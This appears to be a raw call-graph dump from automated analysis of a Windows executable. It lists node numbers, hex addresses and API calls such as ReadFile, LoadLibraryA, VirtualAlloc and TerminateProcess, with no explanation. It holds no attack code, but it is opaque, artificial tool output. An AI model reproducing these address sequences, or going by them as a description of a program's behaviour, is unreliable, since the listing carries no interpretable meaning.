98749->98525 98750->98749 98751 be4063 98750->98751 98834 ba54c6 98751->98834 98755 ba53f3 98754->98755 98768 ba53f0 ISource 98754->98768 98756 ba54c6 3 API calls 98755->98756 98755->98768 98757 ba5410 98756->98757 98758 be3f4b 98757->98758 98759 ba541d 98757->98759 98846 bbfa5b 98758->98846 98761 bbfe0b 22 API calls 98759->98761 98762 ba5429 98761->98762 98763 ba5722 22 API calls 98762->98763 98764 ba5433 98763->98764 98840 ba9a40 98764->98840 98767 ba54c6 3 API calls 98767->98768 98768->98530 98770 bab578 98769->98770 98771 bab57f 98769->98771 98770->98771 98852 bc62d1 39 API calls _strftime 98770->98852 98771->98487 98773 bab5c2 98773->98487 98775 baa961 22 API calls 98774->98775 98776 ba5275 98775->98776 98777 baa961 22 API calls 98776->98777 98778 ba527d 98777->98778 98779 baa961 22 API calls 98778->98779 98780 ba5285 98779->98780 98781 baa961 22 API calls 98780->98781 98782 ba528d 98781->98782 98783 be3df5 98782->98783 98784 ba52c1 98782->98784 98785 baa8c7 22 API calls 98783->98785 98786 ba6d25 22 API calls 98784->98786 98787 be3dfe 98785->98787 98788 ba52cf 98786->98788 98789 baa6c3 22 API calls 98787->98789 98790 ba93b2 22 API calls 98788->98790 98792 ba5304 98789->98792 98791 ba52d9 98790->98791 98791->98792 98793 ba6d25 22 API calls 98791->98793 98796 ba5325 98792->98796 98806 be3e20 98792->98806 98809 ba5349 98792->98809 98795 ba52fa 98793->98795 98798 ba93b2 22 API calls 98795->98798 98796->98809 98866 ba4c6d 98796->98866 98797 ba535a 98800 ba5370 98797->98800 98805 baa8c7 22 API calls 98797->98805 98798->98792 98801 ba5384 98800->98801 98807 baa8c7 22 API calls 98800->98807 98804 ba538f 98801->98804 98810 baa8c7 22 API calls 98801->98810 98803 ba6b57 22 API calls 98813 be3ee0 98803->98813 98811 baa8c7 22 API calls 98804->98811 98815 ba539a 98804->98815 98805->98800 98806->98803 98807->98801 98808 ba6d25 22 API calls 98808->98809 98853 ba6d25 98809->98853 98810->98804 98811->98815 98812 ba4c6d 22 API calls 98812->98813 98813->98809 98813->98812 98869 ba49bd 22 API calls __fread_nolock 98813->98869 98815->98505 98817 ba6362 98816->98817 98818 be4a51 98816->98818 98871 ba6373 98817->98871 98881 ba4a88 22 API calls __fread_nolock 98818->98881 98821 ba636e 98821->98511 98821->98514 98822 be4a5b 98823 be4a67 98822->98823 98824 baa8c7 22 API calls 98822->98824 98824->98823 98825->98529 98826->98533 98827->98532 98828->98540 98829->98540 98830->98731 98831->98731 98832->98728 98833->98734 98835 ba54dd 98834->98835 98836 be3f9c SetFilePointerEx 98835->98836 98837 ba5564 SetFilePointerEx SetFilePointerEx 98835->98837 98838 be3f8b 98835->98838 98839 ba5530 98835->98839 98837->98839 98838->98836 98839->98749 98841 ba9abb 98840->98841 98842 ba9a4e 98840->98842 98851 bbe40f SetFilePointerEx 98841->98851 98844 ba543f 98842->98844 98845 ba9a8c ReadFile 98842->98845 98844->98767 98845->98842 98845->98844 98847 ba54c6 3 API calls 98846->98847 98848 bbfa79 98847->98848 98849 ba54c6 3 API calls 98848->98849 98850 bbfa9a 98849->98850 98850->98768 98851->98842 98852->98773 98854 ba6d91 98853->98854 98855 ba6d34 98853->98855 98856 ba93b2 22 API calls 98854->98856 98855->98854 98857 ba6d3f 98855->98857 98863 ba6d62 __fread_nolock 98856->98863 98858 ba6d5a 98857->98858 98859 be4c9d 98857->98859 98870 ba6f34 22 API calls 98858->98870 98860 bbfddb 22 API calls 98859->98860 98862 be4ca7 98860->98862 98864 bbfe0b 22 API calls 98862->98864 98863->98797 98865 be4cda 98864->98865 98867 baaec9 22 API calls 98866->98867 98868 ba4c78 98867->98868 98868->98808 98868->98809 98869->98813 98870->98863 98872 ba6382 98871->98872 98878 ba63b6 __fread_nolock 98871->98878 98873 be4a82 98872->98873 98874 ba63a9 98872->98874 98872->98878 98875 bbfddb 22 API calls 98873->98875 98876 baa587 22 API calls 98874->98876 98877 be4a91 98875->98877 98876->98878 98879 bbfe0b 22 API calls 98877->98879 98878->98821 98880 be4ac5 __fread_nolock 98879->98880 98881->98822 98883 ba9c7e 98882->98883 98884 bef545 98882->98884 98889 bbfddb 22 API calls 98883->98889 98885 bef556 98884->98885 98887 ba6b57 22 API calls 98884->98887 98886 baa6c3 22 API calls 98885->98886 98888 bef560 98886->98888 98887->98885 98888->98888 98890 ba9c91 98889->98890 98891 ba9c9a 98890->98891 98892 ba9cac 98890->98892 98893 ba9cb3 22 API calls 98891->98893 98894 baa961 22 API calls 98892->98894 98895 ba9ca2 98893->98895 98894->98895 98895->98546 98895->98548 98897 bbfe0b 22 API calls 98896->98897 98898 ba6295 98897->98898 98899 bbfddb 22 API calls 98898->98899 98900 ba62a3 98899->98900 98901 bbf141 98900->98901 98902 bbf188 98901->98902 98903 bbf14c 98901->98903 98904 baa6c3 22 API calls 98902->98904 98903->98902 98906 bbf15b 98903->98906 98905 c0caeb 98904->98905 98913 c0cb1a 98905->98913 98931 c0ca89 ReadFile SetFilePointerEx 98905->98931 98932 ba49bd 22 API calls __fread_nolock 98905->98932 98907 bbf170 98906->98907 98909 bbf17d 98906->98909 98923 bbf18e 98907->98923 98930 c0cbf2 26 API calls 98909->98930 98912 bbf179 98912->98583 98913->98583 98915->98592 98916->98590 98917->98593 98918->98597 98919->98548 98920->98548 98921->98579 98922->98588 98933 bbf1d8 98923->98933 98929 bbf1c1 98929->98912 98930->98912 98931->98905 98932->98905 98934 bbfe0b 22 API calls 98933->98934 98935 bbf1ef 98934->98935 98936 bbfddb 22 API calls 98935->98936 98937 bbf1a6 98936->98937 98938 ba97b6 98937->98938 98945 ba9a1e 98938->98945 98940 ba97fc 98940->98929 98944 ba6e14 24 API calls 98940->98944 98941 ba9a40 2 API calls 98942 ba97c7 98941->98942 98942->98940 98942->98941 98952 ba9b01 22 API calls __fread_nolock 98942->98952 98944->98929 98946 ba9a2f 98945->98946 98947 bef378 98945->98947 98946->98942 98948 bbfddb 22 API calls 98947->98948 98949 bef382 98948->98949 98950 bbfe0b 22 API calls 98949->98950 98951 bef397 98950->98951 98952->98942 98954 ba7510 53 API calls 98953->98954 98955 c27f90 98954->98955 98980 c27fd5 ISource 98955->98980 98991 c28cd3 98955->98991 98957 c28281 98958 c2844f 98957->98958 98963 c2828f 98957->98963 99032 c28ee4 60 API calls 98958->99032 98961 c2845e 98961->98963 98964 c2846a 98961->98964 98962 ba7510 53 API calls 98978 c28049 98962->98978 99004 c27e86 98963->99004 98964->98980 98969 c282c8 99019 bbfc70 98969->99019 98972 c28302 99026 ba63eb 22 API calls 98972->99026 98973 c282e8 99025 c1359c 82 API calls __wsopen_s 98973->99025 98976 c282f3 GetCurrentProcess TerminateProcess 98976->98972 98977 c28311 99027 ba6a50 22 API calls 98977->99027 98978->98957 98978->98962 98978->98980 99023 c0417d 22 API calls __fread_nolock 98978->99023 99024 c2851d 42 API calls _strftime 98978->99024 98980->98601 98981 c2832a 98990 c28352 98981->98990 99028 bb04f0 22 API calls 98981->99028 98982 c284c5 98982->98980 98987 c284d9 FreeLibrary 98982->98987 98984 c28341 99029 c28b7b 75 API calls 98984->99029 98987->98980 98990->98982 99030 bb04f0 22 API calls 98990->99030 99031 baaceb 23 API calls ISource 98990->99031 99033 c28b7b 75 API calls 98990->99033 98992 baaec9 22 API calls 98991->98992 98993 c28cee CharLowerBuffW 98992->98993 99034 c08e54 98993->99034 98997 baa961 22 API calls 98998 c28d2a 98997->98998 98999 ba6d25 22 API calls 98998->98999 99000 c28d3e 98999->99000 99001 ba93b2 22 API calls 99000->99001 99003 c28d48 _wcslen 99001->99003 99002 c28e5e _wcslen 99002->98978 99003->99002 99041 c2851d 42 API calls _strftime 99003->99041 99005 c27ea1 99004->99005 99006 c27eec 99004->99006 99007 bbfe0b 22 API calls 99005->99007 99010 c29096 99006->99010 99008 c27ec3 99007->99008 99008->99006 99009 bbfddb 22 API calls 99008->99009 99009->99008 99011 c292ab ISource 99010->99011 99018 c290ba _strcat _wcslen 99010->99018 99011->98969 99012 bab6b5 39 API calls 99012->99018 99013 bab567 39 API calls 99013->99018 99014 bab38f 39 API calls 99014->99018 99015 ba7510 53 API calls 99015->99018 99016 bcea0c 21 API calls ___std_exception_copy 99016->99018 99018->99011 99018->99012 99018->99013 99018->99014 99018->99015 99018->99016 99044 c0efae 24 API calls _wcslen 99018->99044 99021 bbfc85 99019->99021 99020 bbfd1d VirtualAlloc 99022 bbfceb 99020->99022 99021->99020 99021->99022 99022->98972 99022->98973 99023->98978 99024->98978 99025->98976 99026->98977 99027->98981 99028->98984 99029->98990 99030->98990 99031->98990 99032->98961 99033->98990 99035 c08e74 _wcslen 99034->99035 99036 c08ea9 99035->99036 99037 c08f63 99035->99037 99040 c08f68 99035->99040 99036->99037 99042 bbce60 41 API calls 99036->99042 99037->98997 99037->99003 99040->99037 99043 bbce60 41 API calls 99040->99043 99041->99002 99042->99036 99043->99040 99044->99018 99046 c0d4d5 99045->99046 99047 c0dbdc GetFileAttributesW 99045->99047 99046->98426 99047->99046 99048 c0dbe8 FindFirstFileW 99047->99048 99048->99046 99049 c0dbf9 FindClose 99048->99049 99049->99046 99051 ba6270 22 API calls 99050->99051 99077 ba9eb5 99051->99077 99052 ba9fd2 99079 baa4a1 22 API calls __fread_nolock 99052->99079 99054 ba9fec 99054->98609 99057 baa6c3 22 API calls 99057->99077 99058 bef7c4 99084 c096e2 84 API calls __wsopen_s 99058->99084 99059 bef699 99065 bbfddb 22 API calls 99059->99065 99061 baa4a1 22 API calls 99061->99077 99062 baa405 99062->99054 99086 c096e2 84 API calls __wsopen_s 99062->99086 99067 bef754 99065->99067 99066 bef7d2 99085 baa4a1 22 API calls __fread_nolock 99066->99085 99070 bbfe0b 22 API calls 99067->99070 99069 bef7e8 99069->99054 99072 baa12c __fread_nolock 99070->99072 99072->99058 99072->99062 99073 baa587 22 API calls 99073->99077 99074 baaec9 22 API calls 99075 baa0db CharUpperBuffW 99074->99075 99080 baa673 22 API calls 99075->99080 99077->99052 99077->99057 99077->99058 99077->99059 99077->99061 99077->99062 99077->99072 99077->99073 99077->99074 99078 ba4573 41 API calls _wcslen 99077->99078 99081 ba48c8 23 API calls 99077->99081 99082 ba49bd 22 API calls __fread_nolock 99077->99082 99083 baa673 22 API calls 99077->99083 99078->99077 99079->99054 99080->99077 99081->99077 99082->99077 99083->99077 99084->99066 99085->99069 99086->99054 99226 ba4e90 LoadLibraryA 99087->99226 99092 be3ccf 99095 ba4f39 68 API calls 99092->99095 99093 ba4ef6 LoadLibraryExW 99234 ba4e59 LoadLibraryA 99093->99234 99097 be3cd6 99095->99097 99099 ba4e59 3 API calls 99097->99099 99100 be3cde 99099->99100 99256 ba50f5 99100->99256 99101 ba4f20 99101->99100 99102 ba4f2c 99101->99102 99104 ba4f39 68 API calls 99102->99104 99106 ba4f31 99104->99106 99106->98632 99106->98633 99108 be3d05 99110 c0d7d8 99109->99110 99111 c0d7f3 99110->99111 99112 c0d7dd 99110->99112 99113 baa961 22 API calls 99111->99113 99114 baa8c7 22 API calls 99112->99114 99162 c0d7ee 99112->99162 99115 c0d7fb 99113->99115 99114->99162 99116 baa961 22 API calls 99115->99116 99117 c0d803 99116->99117 99118 baa961 22 API calls 99117->99118 99119 c0d80e 99118->99119 99120 baa961 22 API calls 99119->99120 99121 c0d816 99120->99121 99122 baa961 22 API calls 99121->99122 99123 c0d81e 99122->99123 99124 baa961 22 API calls 99123->99124 99125 c0d826 99124->99125 99126 baa961 22 API calls 99125->99126 99127 c0d82e 99126->99127 99128 baa961 22 API calls 99127->99128 99129 c0d836 99128->99129 99130 ba525f 22 API calls 99129->99130 99131 c0d84d 99130->99131 99132 ba525f 22 API calls 99131->99132 99133 c0d866 99132->99133 99134 ba4c6d 22 API calls 99133->99134 99135 c0d872 99134->99135 99136 c0d885 99135->99136 99138 ba93b2 22 API calls 99135->99138 99137 ba4c6d 22 API calls 99136->99137 99139 c0d88e 99137->99139 99138->99136 99140 c0d89e 99139->99140 99141 ba93b2 22 API calls 99139->99141 99142 c0d8b0 99140->99142 99143 baa8c7 22 API calls 99140->99143 99141->99140 99144 ba6350 22 API calls 99142->99144 99143->99142 99145 c0d8bb 99144->99145 99513 c0d978 22 API calls 99145->99513 99147 c0d8ca 99514 c0d978 22 API calls 99147->99514 99149 c0d8dd 99150 ba4c6d 22 API calls 99149->99150 99151 c0d8e7 99150->99151 99152 c0d8ec 99151->99152 99153 c0d8fe 99151->99153 99154 ba33c6 22 API calls 99152->99154 99155 ba4c6d 22 API calls 99153->99155 99156 c0d8f9 99154->99156 99157 c0d907 99155->99157 99160 ba6350 22 API calls 99156->99160 99158 c0d925 99157->99158 99159 ba33c6 22 API calls 99157->99159 99161 ba6350 22 API calls 99158->99161 99159->99156 99160->99158 99161->99162 99162->98688 99164 c12954 __wsopen_s 99163->99164 99165 bbfe0b 22 API calls 99164->99165 99166 c12971 99165->99166 99167 ba5722 22 API calls 99166->99167 99168 c1297b 99167->99168 99169 c1274e 27 API calls 99168->99169 99170 c12986 99169->99170 99171 ba511f 64 API calls 99170->99171 99172 c1299b 99171->99172 99173 c12a6c 99172->99173 99174 c129bf 99172->99174 99175 c12e66 75 API calls 99173->99175 99541 c12e66 99174->99541 99177 c12a38 99175->99177 99180 ba50f5 40 API calls 99177->99180 99201 c12a75 ISource 99177->99201 99181 c12a91 99180->99181 99182 ba50f5 40 API calls 99181->99182 99183 c12aa1 99182->99183 99185 ba50f5 40 API calls 99183->99185 99184 c129ed 99548 bcd583 26 API calls 99184->99548 99187 c12abc 99185->99187 99188 ba50f5 40 API calls 99187->99188 99189 c12acc 99188->99189 99190 ba50f5 40 API calls 99189->99190 99191 c12ae7 99190->99191 99192 ba50f5 40 API calls 99191->99192 99193 c12af7 99192->99193 99194 ba50f5 40 API calls 99193->99194 99195 c12b07 99194->99195 99196 ba50f5 40 API calls 99195->99196 99197 c12b17 99196->99197 99515 c13017 GetTempPathW GetTempFileNameW 99197->99515 99199 c12b22 99200 bce5eb 29 API calls 99199->99200 99212 c12b33 99200->99212 99201->98695 99202 c12bed 99525 bce678 99202->99525 99205 ba50f5 40 API calls 99205->99212 99212->99201 99212->99202 99212->99205 99516 bcdbb3 99212->99516 99218->98655 99219->98669 99221 ba4f4a 99220->99221 99222 ba4f43 99220->99222 99224 ba4f6a FreeLibrary 99221->99224 99225 ba4f59 99221->99225 99223 bce678 67 API calls 99222->99223 99223->99221 99224->99225 99225->98696 99227 ba4ea8 GetProcAddress 99226->99227 99228 ba4ec6 99226->99228 99229 ba4eb8 99227->99229 99231 bce5eb 99228->99231 99229->99228 99230 ba4ebf FreeLibrary 99229->99230 99230->99228 99264 bce52a 99231->99264 99233 ba4eea 99233->99092 99233->99093 99235 ba4e6e GetProcAddress 99234->99235 99236 ba4e8d 99234->99236 99237 ba4e7e 99235->99237 99239 ba4f80 99236->99239 99237->99236 99238 ba4e86 FreeLibrary 99237->99238 99238->99236 99240 bbfe0b 22 API calls 99239->99240 99241 ba4f95 99240->99241 99242 ba5722 22 API calls 99241->99242 99243 ba4fa1 __fread_nolock 99242->99243 99244 be3d1d 99243->99244 99245 ba50a5 99243->99245 99255 ba4fdc 99243->99255 99327 c1304d 74 API calls 99244->99327 99316 ba42a2 CreateStreamOnHGlobal 99245->99316 99248 be3d22 99250 ba511f 64 API calls 99248->99250 99249 ba50f5 40 API calls 99249->99255 99251 be3d45 99250->99251 99252 ba50f5 40 API calls 99251->99252 99254 ba506e ISource 99252->99254 99254->99101 99255->99248 99255->99249 99255->99254 99322 ba511f 99255->99322 99257 ba5107 99256->99257 99258 be3d70 99256->99258 99349 bce8c4 99257->99349 99261 c128fe 99490 c1274e 99261->99490 99263 c12919 99263->99108 99267 bce536 CallCatchBlock 99264->99267 99265 bce544 99289 bcf2d9 20 API calls __dosmaperr 99265->99289 99267->99265 99269 bce574 99267->99269 99268 bce549 99290 bd27ec 26 API calls _strftime 99268->99290 99271 bce579 99269->99271 99272 bce586 99269->99272 99291 bcf2d9 20 API calls __dosmaperr 99271->99291 99281 bd8061 99272->99281 99275 bce58f 99276 bce595 99275->99276 99277 bce5a2 99275->99277 99292 bcf2d9 20 API calls __dosmaperr 99276->99292 99293 bce5d4 LeaveCriticalSection __fread_nolock 99277->99293 99278 bce554 __fread_nolock 99278->99233 99282 bd806d CallCatchBlock 99281->99282 99294 bd2f5e EnterCriticalSection 99282->99294 99284 bd807b 99295 bd80fb 99284->99295 99288 bd80ac __fread_nolock 99288->99275 99289->99268 99290->99278 99291->99278 99292->99278 99293->99278 99294->99284 99303 bd811e 99295->99303 99296 bd8177 99297 bd4c7d pre_c_initialization 20 API calls 99296->99297 99298 bd8180 99297->99298 99300 bd29c8 _free 20 API calls 99298->99300 99301 bd8189 99300->99301 99304 bd8088 99301->99304 99313 bd3405 11 API calls 2 library calls 99301->99313 99303->99296 99303->99304 99311 bc918d EnterCriticalSection 99303->99311 99312 bc91a1 LeaveCriticalSection 99303->99312 99308 bd80b7 99304->99308 99305 bd81a8 99314 bc918d EnterCriticalSection 99305->99314 99315 bd2fa6 LeaveCriticalSection 99308->99315 99310 bd80be 99310->99288 99311->99303 99312->99303 99313->99305 99314->99304 99315->99310 99317 ba42d9 99316->99317 99318 ba42bc FindResourceExW 99316->99318 99317->99255 99318->99317 99319 be35ba LoadResource 99318->99319 99319->99317 99320 be35cf SizeofResource 99319->99320 99320->99317 99321 be35e3 LockResource 99320->99321 99321->99317 99323 ba512e 99322->99323 99324 be3d90 99322->99324 99328 bcece3 99323->99328 99327->99248 99331 bceaaa 99328->99331 99330 ba513c 99330->99255 99333 bceab6 CallCatchBlock 99331->99333 99332 bceac2 99344 bcf2d9 20 API calls __dosmaperr 99332->99344 99333->99332 99334 bceae8 99333->99334 99346 bc918d EnterCriticalSection 99334->99346 99337 bceac7 99345 bd27ec 26 API calls _strftime 99337->99345 99338 bceaf4 99347 bcec0a 62 API calls 2 library calls 99338->99347 99341 bceb08 99348 bceb27 LeaveCriticalSection __fread_nolock 99341->99348 99343 bcead2 __fread_nolock 99343->99330 99344->99337 99345->99343 99346->99338 99347->99341 99348->99343 99352 bce8e1 99349->99352 99351 ba5118 99351->99261 99353 bce8ed CallCatchBlock 99352->99353 99354 bce92d 99353->99354 99355 bce925 __fread_nolock 99353->99355 99359 bce900 ___scrt_fastfail 99353->99359 99365 bc918d EnterCriticalSection 99354->99365 99355->99351 99358 bce937 99366 bce6f8 99358->99366 99379 bcf2d9 20 API calls __dosmaperr 99359->99379 99360 bce91a 99380 bd27ec 26 API calls _strftime 99360->99380 99365->99358 99369 bce70a ___scrt_fastfail 99366->99369 99372 bce727 99366->99372 99367 bce717 99454 bcf2d9 20 API calls __dosmaperr 99367->99454 99369->99367 99369->99372 99377 bce76a __fread_nolock 99369->99377 99370 bce71c 99455 bd27ec 26 API calls _strftime 99370->99455 99381 bce96c LeaveCriticalSection __fread_nolock 99372->99381 99373 bce886 ___scrt_fastfail 99457 bcf2d9 20 API calls __dosmaperr 99373->99457 99377->99372 99377->99373 99382 bcd955 99377->99382 99389 bd8d45 99377->99389 99456 bccf78 26 API calls 4 library calls 99377->99456 99379->99360 99380->99355 99381->99355 99383 bcd976 99382->99383 99384 bcd961 99382->99384 99383->99377 99458 bcf2d9 20 API calls __dosmaperr 99384->99458 99386 bcd966 99459 bd27ec 26 API calls _strftime 99386->99459 99388 bcd971 99388->99377 99390 bd8d6f 99389->99390 99391 bd8d57 99389->99391 99393 bd90d9 99390->99393 99398 bd8db4 99390->99398 99469 bcf2c6 20 API calls __dosmaperr 99391->99469 99484 bcf2c6 20 API calls __dosmaperr 99393->99484 99394 bd8d5c 99470 bcf2d9 20 API calls __dosmaperr 99394->99470 99397 bd90de 99485 bcf2d9 20 API calls __dosmaperr 99397->99485 99400 bd8dbf 99398->99400 99401 bd8d64 99398->99401 99405 bd8def 99398->99405 99471 bcf2c6 20 API calls __dosmaperr 99400->99471 99401->99377 99402 bd8dcc 99486 bd27ec 26 API calls _strftime 99402->99486 99404 bd8dc4 99472 bcf2d9 20 API calls __dosmaperr 99404->99472 99408 bd8e08 99405->99408 99409 bd8e2e 99405->99409 99410 bd8e4a 99405->99410 99408->99409 99414 bd8e15 99408->99414 99473 bcf2c6 20 API calls __dosmaperr 99409->99473 99412 bd3820 _strftime 21 API calls 99410->99412 99415 bd8e61 99412->99415 99413 bd8e33 99474 bcf2d9 20 API calls __dosmaperr 99413->99474 99460 bdf89b 99414->99460 99418 bd29c8 _free 20 API calls 99415->99418 99421 bd8e6a 99418->99421 99419 bd8fb3 99422 bd9029 99419->99422 99426 bd8fcc GetConsoleMode 99419->99426 99420 bd8e3a 99475 bd27ec 26 API calls _strftime 99420->99475 99424 bd29c8 _free 20 API calls 99421->99424 99425 bd902d ReadFile 99422->99425 99427 bd8e71 99424->99427 99428 bd9047 99425->99428 99429 bd90a1 GetLastError 99425->99429 99426->99422 99430 bd8fdd 99426->99430 99432 bd8e7b 99427->99432 99433 bd8e96 99427->99433 99428->99429 99436 bd901e 99428->99436 99434 bd90ae 99429->99434 99435 bd9005 99429->99435 99430->99425 99431 bd8fe3 ReadConsoleW 99430->99431 99431->99436 99437 bd8fff GetLastError 99431->99437 99476 bcf2d9 20 API calls __dosmaperr 99432->99476 99478 bd9424 28 API calls __wsopen_s 99433->99478 99482 bcf2d9 20 API calls __dosmaperr 99434->99482 99451 bd8e45 __fread_nolock 99435->99451 99479 bcf2a3 20 API calls 2 library calls 99435->99479 99445 bd906c 99436->99445 99446 bd9083 99436->99446 99436->99451 99437->99435 99438 bd29c8 _free 20 API calls 99438->99401 99443 bd8e80 99477 bcf2c6 20 API calls __dosmaperr 99443->99477 99444 bd90b3 99483 bcf2c6 20 API calls __dosmaperr 99444->99483 99480 bd8a61 31 API calls 4 library calls 99445->99480 99450 bd909a 99446->99450 99446->99451 99481 bd88a1 29 API calls __wsopen_s 99450->99481 99451->99438 99453 bd909f 99453->99451 99454->99370 99455->99372 99456->99377 99457->99370 99458->99386 99459->99388 99461 bdf8a8 99460->99461 99462 bdf8b5 99460->99462 99487 bcf2d9 20 API calls __dosmaperr 99461->99487 99465 bdf8c1 99462->99465 99488 bcf2d9 20 API calls __dosmaperr 99462->99488 99464 bdf8ad 99464->99419 99465->99419 99467 bdf8e2 99489 bd27ec 26 API calls _strftime 99467->99489 99469->99394 99470->99401 99471->99404 99472->99402 99473->99413 99474->99420 99475->99451 99476->99443 99477->99451 99478->99414 99479->99451 99480->99451 99481->99453 99482->99444 99483->99451 99484->99397 99485->99402 99486->99401 99487->99464 99488->99467 99489->99464 99493 bce4e8 99490->99493 99492 c1275d 99492->99263 99496 bce469 99493->99496 99495 bce505 99495->99492 99497 bce48c 99496->99497 99498 bce478 99496->99498 99503 bce488 __alldvrm 99497->99503 99504 bd333f 99497->99504 99511 bcf2d9 20 API calls __dosmaperr 99498->99511 99500 bce47d 99512 bd27ec 26 API calls _strftime 99500->99512 99503->99495 99505 bd2fd7 pre_c_initialization 5 API calls 99504->99505 99506 bd3366 99505->99506 99507 bd337e GetSystemTimeAsFileTime 99506->99507 99508 bd3372 99506->99508 99507->99508 99509 bc0a8c CatchGuardHandler 5 API calls 99508->99509 99510 bd338f 99509->99510 99510->99503 99511->99500 99512->99503 99513->99147 99514->99149 99515->99199 99517 bcdbc1 99516->99517 99518 bcdbdd 99516->99518 99517->99518 99519 bcdbcd 99517->99519 99520 bcdbe3 99517->99520 99518->99212 99581 bcf2d9 20 API calls __dosmaperr 99519->99581 99578 bcd9cc 99520->99578 99526 bce684 CallCatchBlock 99525->99526 99527 bce6aa 99526->99527 99528 bce695 99526->99528 99536 bce6a5 __fread_nolock 99527->99536 99716 bc918d EnterCriticalSection 99527->99716 99733 bcf2d9 20 API calls __dosmaperr 99528->99733 99545 c12e7a 99541->99545 99542 ba50f5 40 API calls 99542->99545 99543 c128fe 27 API calls 99543->99545 99544 c129c4 99544->99201 99547 bcd583 26 API calls 99544->99547 99545->99542 99545->99543 99545->99544 99546 ba511f 64 API calls 99545->99546 99546->99545 99547->99184 99548->99177 99834 bd90fa 99835 bd9107 99834->99835 99838 bd911f 99834->99838 99884 bcf2d9 20 API calls __dosmaperr 99835->99884 99837 bd910c 99885 bd27ec 26 API calls _strftime 99837->99885 99839 bd9117 99838->99839 99841 bd917a 99838->99841 99886 bdfdc4 21 API calls 2 library calls 99838->99886 99843 bcd955 __fread_nolock 26 API calls 99841->99843 99844 bd9192 99843->99844 99854 bd8c32 99844->99854 99846 bd9199 99846->99839 99847 bcd955 __fread_nolock 26 API calls 99846->99847 99848 bd91c5 99847->99848 99848->99839 99849 bcd955 __fread_nolock 26 API calls 99848->99849 99850 bd91d3 99849->99850 99850->99839 99851 bcd955 __fread_nolock 26 API calls 99850->99851 99852 bd91e3 99851->99852 99853 bcd955 __fread_nolock 26 API calls 99852->99853 99853->99839 99855 bd8c3e CallCatchBlock 99854->99855 99856 bd8c5e 99855->99856 99857 bd8c46 99855->99857 99859 bd8d24 99856->99859 99864 bd8c97 99856->99864 99888 bcf2c6 20 API calls __dosmaperr 99857->99888 99895 bcf2c6 20 API calls __dosmaperr 99859->99895 99861 bd8c4b 99889 bcf2d9 20 API calls __dosmaperr 99861->99889 99862 bd8d29 99896 bcf2d9 20 API calls __dosmaperr 99862->99896 99866 bd8cbb 99864->99866 99867 bd8ca6 99864->99867 99887 bd5147 EnterCriticalSection 99866->99887 99890 bcf2c6 20 API calls __dosmaperr 99867->99890 99870 bd8cb3 99897 bd27ec 26 API calls _strftime 99870->99897 99871 bd8cab 99891 bcf2d9 20 API calls __dosmaperr 99871->99891 99872 bd8cc1 99874 bd8cdd 99872->99874 99875 bd8cf2 99872->99875 99892 bcf2d9 20 API calls __dosmaperr 99874->99892 99879 bd8d45 __fread_nolock 38 API calls 99875->99879 99877 bd8c53 __fread_nolock 99877->99846 99881 bd8ced 99879->99881 99880 bd8ce2 99893 bcf2c6 20 API calls __dosmaperr 99880->99893 99894 bd8d1c LeaveCriticalSection __wsopen_s 99881->99894 99884->99837 99885->99839 99886->99841 99887->99872 99888->99861 99889->99877 99890->99871 99891->99870 99892->99880 99893->99881 99894->99877 99895->99862 99896->99870 99897->99877 99898 bc03fb 99899 bc0407 CallCatchBlock 99898->99899 99927 bbfeb1 99899->99927 99901 bc040e 99902 bc0561 99901->99902 99905 bc0438 99901->99905 99954 bc083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99902->99954 99904 bc0568 99955 bc4e52 28 API calls _abort 99904->99955 99912 bc0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99905->99912 99938 bd247d 99905->99938 99907 bc056e 99956 bc4e04 28 API calls _abort 99907->99956 99911 bc0576 99915 bc04d8 99912->99915 99950 bc4e1a 38 API calls 3 library calls 99912->99950 99913 bc0457 99946 bc0959 99915->99946 99918 bc04de 99919 bc04f3 99918->99919 99951 bc0992 GetModuleHandleW 99919->99951 99921 bc04fa 99921->99904 99922 bc04fe 99921->99922 99923 bc0507 99922->99923 99952 bc4df5 28 API calls _abort 99922->99952 99953 bc0040 13 API calls 2 library calls 99923->99953 99926 bc050f 99926->99913 99928 bbfeba 99927->99928 99957 bc0698 IsProcessorFeaturePresent 99928->99957 99930 bbfec6 99958 bc2c94 99930->99958 99932 bbfecb 99937 bbfecf 99932->99937 99967 bd2317 99932->99967 99935 bbfee6 99935->99901 99937->99901 99941 bd2494 99938->99941 99939 bc0a8c CatchGuardHandler 5 API calls 99940 bc0451 99939->99940 99940->99913 99942 bd2421 99940->99942 99941->99939 99945 bd2450 99942->99945 99943 bc0a8c CatchGuardHandler 5 API calls 99944 bd2479 99943->99944 99944->99912 99945->99943 100060 bc2340 99946->100060 99948 bc096c GetStartupInfoW 99949 bc097f 99948->99949 99949->99918 99950->99915 99951->99921 99952->99923 99953->99926 99954->99904 99955->99907 99956->99911 99957->99930 99959 bc2c99 ___vcrt_initialize_winapi_thunks 99958->99959 99971 bc3462 99959->99971 99963 bc2caf 99964 bc2cba 99963->99964 99985 bc349e DeleteCriticalSection 99963->99985 99964->99932 99966 bc2ca7 99966->99932 100013 bdd1f6 99967->100013 99970 bc2cbd 8 API calls 3 library calls 99970->99937 99973 bc346b 99971->99973 99974 bc3494 99973->99974 99975 bc2ca3 99973->99975 99986 bc36ef 99973->99986 99991 bc349e DeleteCriticalSection 99974->99991 99975->99966 99977 bc3414 99975->99977 100006 bc3600 99977->100006 99980 bc3429 99980->99963 99982 bc3437 99983 bc3444 99982->99983 100012 bc3447 6 API calls ___vcrt_FlsFree 99982->100012 99983->99963 99985->99966 99992 bc3591 99986->99992 99988 bc3709 99989 bc3727 InitializeCriticalSectionAndSpinCount 99988->99989 99990 bc3712 99988->99990 99989->99990 99990->99973 99991->99975 99993 bc35b9 99992->99993 99994 bc35b5 __crt_fast_encode_pointer 99992->99994 99993->99994 99999 bc34cd 99993->99999 99994->99988 99997 bc35d3 GetProcAddress 99997->99994 99998 bc35e3 __crt_fast_encode_pointer 99997->99998 99998->99994 100004 bc34dc try_get_first_available_module 99999->100004 100000 bc3586 100000->99994 100000->99997 100001 bc34f9 LoadLibraryExW 100002 bc3514 GetLastError 100001->100002 100001->100004 100002->100004 100003 bc356f FreeLibrary 100003->100004 100004->100000 100004->100001 100004->100003 100005 bc3547 LoadLibraryExW 100004->100005 100005->100004 100007 bc3591 try_get_function 5 API calls 100006->100007 100008 bc361a 100007->100008 100009 bc3633 TlsAlloc 100008->100009 100010 bc341e 100008->100010 100010->99980 100011 bc36b1 6 API calls try_get_function 100010->100011 100011->99982 100012->99980 100014 bdd213 100013->100014 